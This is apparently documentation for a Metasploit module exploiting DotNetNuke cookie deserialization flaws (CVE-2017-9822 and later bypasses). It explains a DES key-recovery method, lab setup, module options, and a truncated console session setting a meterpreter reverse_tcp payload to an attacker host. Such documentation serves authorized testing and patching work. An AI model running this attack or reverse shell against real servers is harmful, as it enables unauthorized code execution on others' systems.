This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC. Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization. The cookie is processed by the application whenever it attempts to load the current user's profile data, which occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration). An attacker can leverage this vulnerability to execute arbitrary code on the system.
### DNN v5.0.0 - v9.1.0
**CVE-2017-9822**:
Directly exploitable.
### DNN v9.1.1 - v9.2.1
**CVE-2018-15811**, **CVE-2018-15812**:
The patch for CVE-2017-9822 used a weak encryption algorithm (DES) and an encryption key of low entropy. Furthermore, if the target site is configured to use Verified Registration, the plaintext value of the registration verification code is exposed on the user profile page. Since the verification code is encrypted using the same algorithm and key as the DNNPersonalization cookie, a known-plaintext attack can be used to recover the key and re-exploit CVE-2017-9822 with an encrypted cookie. In some cases a valid .DOTNETNUKE session token may be required for exploitation (v9.2.0+)
### DNN v9.2.2 - v9.3.0-RC
**CVE-2018-18325**, **CVE-2018-18326**:
The implemented patch for CVE-2018-15811 and CVE-2018-15812 did not prevent exploitation. The patch changed the encryption key used to encrypt and decrypt the DNNPersonalization cookie; however, this encryption key was still derived from the key used to encrypt and decrypt the registration verification code and the strength of the encryption algorithm was not increased (DES). Additional changes were made to prevent the full plaintext of the verification code from being disclosed. A partial plaintext value was still disclosed on the user profile page. Due to the project being open-source, it was possible to determine the format of the rest of the plaintext verification code. Using a list of obtained verification codes and the known partial plaintext value, it is possible to reduce the number of potential encryption keys through offline processing to a point where trying to re-exploit CVE-2017-9822 with each potential key becomes a feasible attack.
## Vulnerable Application
On a Windows machine, download the "Install" package from here:
You will need SQL Server 2005/2008/2008R2/2012 or 2016 installed.
Log in as the super user account and make sure the 404 error page is set to the built-in 404 Error Page.
Typically, this is already set as the default setting, but during testing I encountered an edge case where an issue during installation caused this value to be set to "None Specified".
Additionally, if you are testing this module from a machine other than the host that the application is installed on, you will need to configure the Site Alias so that it is accessible using a hostname other than `localhost`. Additional firewall rules may need to be configured to allow web access, depending on how you set up the application in IIS.
This module has been tested on DNN v7.0.0 - v9.3.0-RC running on Windows Server 2016.
### v5.0.0 - v9.1.0
No additional configuration required.
### v9.1.1+
While logged in as the super user account, configure the application to use Verified registration. You will also need to configure the SMTP server settings to be valid in order to receive the registration email.
In these versions, the `userId` value was changed to be a randomly generated GUID. This means that only the first part of the verification plaintext is known. By providing a list of several verification codes, it is possible to reduce the number of potential encryption key values to a feasible amount. Once the list of encryption keys has been reduced, the module will test each key until an HTTP callback is received on port `8080` that indicates which key worked. Then, the final exploit payload will be encrypted using the recovered key and sent to the server, resulting in a shell.
Set this to `true` to generate a payload, but not send the exploit to the target server. Default value is `false`.
**ENCRYPTED**
Set this to `true` for targets running v9.1.1+. Default value is `false`.
**IV**
The initialization vector to use for encrypting the payload. If specified along with `KEY`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
**KEY**
The key to use for encryption. If specified along with `IV`, `VERIFICATION_CODE` and `VERIFICATION_PLAIN` options will be ignored.
**SESSION_TOKEN**
The .DOTNETNUKE session cookie value to use when submitting the payload to the server. Required for targets running v9.2.0+.
**SRVPORT**
The server port to listen for HTTP callbacks on when testing encryption passphrases for targets running v9.2.2 - v9.3.0-RC. Default value is `8080`
**TARGETURI**
Path to a page that will result in a DNN 404 Error Page. The default location is `/__`
**VERIFICATION_CODE**
The verification code received in an email, or the full path to a file containing multiple verification codes.
**VERIFICATION_PLAIN**
The known (full or partial) plaintext of the encrypted verification code. Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer (v9.1.1 - v9.2.1) or GUID (v9.2.2+).
## Scenarios
### v5.1.0 - v9.1.0
Here's showing the expected output:
```
msf5 > use exploit/windows/http/dnn_cookie_deserialization_rce
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOSTS 192.168.31.131
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set RPORT 8083
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST 192.168.31.128
msf5 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 443
[!] DNN Version Found: v9.2.0+ - Requires ENCRYPTED and SESSION_TOKEN. Setting target to 3 (v9.2.0 - v9.2.1). Site may also be 9.2.2 - try setting target 4 and supply a file of verification codes, or specify valid Key and IV values.
